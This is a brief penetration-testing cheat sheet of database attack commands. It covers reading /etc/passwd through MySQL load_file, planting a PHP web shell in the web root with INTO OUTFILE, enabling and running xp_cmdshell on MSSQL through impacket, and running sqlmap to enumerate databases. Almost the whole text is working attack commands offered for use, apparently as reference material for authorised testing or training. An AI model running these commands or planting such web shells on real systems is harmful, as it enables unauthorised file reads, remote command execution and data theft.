MySQL (3306)

mysql -h <IP> -u root -p
show databases;
select load_file("/etc/passwd");
select "<?php system($_GET['c']); ?>" into outfile "/var/www/html/shell.php";

MSSQL (1433)

impacket-mssqlclient user:pass@<IP>
> enable_xp_cmdshell
> xp_cmdshell whoami

SQLMap

sqlmap -u "http://site.com?id=1" --dbs --batch
sqlmap -r req.txt --dbs  # For POST requests
